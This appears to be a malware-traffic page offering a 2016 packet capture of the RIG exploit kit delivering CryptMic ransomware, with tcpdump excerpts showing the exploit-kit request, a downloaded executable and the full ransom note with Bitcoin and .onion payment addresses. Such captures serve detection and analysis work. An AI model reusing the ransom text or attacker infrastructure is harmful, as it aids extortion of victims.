RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

Download Attachments

  • 1 pcap 2016-09-26-rig-ek
    Date added: September 27, 2016 11:46 pm Added by: admin File size: 427 KB Downloads: 121

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site

 

Leave a Reply